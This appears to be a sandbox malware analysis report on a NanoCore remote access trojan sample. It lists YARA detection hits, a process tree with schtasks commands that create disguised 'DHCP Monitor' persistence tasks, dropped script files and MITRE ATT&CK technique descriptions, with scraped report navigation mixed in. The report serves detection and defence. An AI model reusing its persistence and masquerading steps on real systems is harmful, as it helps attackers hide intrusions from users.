Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs

Analysis Process: schtasks.exePID: 7796, Parent PID: 7772

General

Target ID:	14
Start time:	06:22:30
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Imagebase:	0x150000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 7812, Parent PID: 7796

General

Target ID:	15
Start time:	06:22:30
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exePID: 7852, Parent PID: 7772

General

Target ID:	16
Start time:	06:22:30
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Imagebase:	0x150000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 7860, Parent PID: 7852

General

Target ID:	17
Start time:	06:22:30
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: RegSvcs.exePID: 7924, Parent PID: 1080

General

Target ID:	18
Start time:	06:22:31
Start date:	30/05/2023
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Imagebase:	0xba0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exePID: 7932, Parent PID: 7924

General

Target ID:	19
Start time:	06:22:31
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: dhcpmon.exePID: 7940, Parent PID: 1080

General

Target ID:	20
Start time:	06:22:31
Start date:	30/05/2023
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Imagebase:	0x140000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, ReversingLabs

Analysis Process: conhost.exePID: 7972, Parent PID: 7940

General

Target ID:	21
Start time:	06:22:31
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report P05jmXYKpr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: NanoCore

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

C:\Users\user\AppData\Local\Temp\RarSFX0\Update-ta.l.vbe

C:\Users\user\AppData\Local\Temp\RarSFX0\Update.vbs

C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Windows Analysis Report
P05jmXYKpr.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre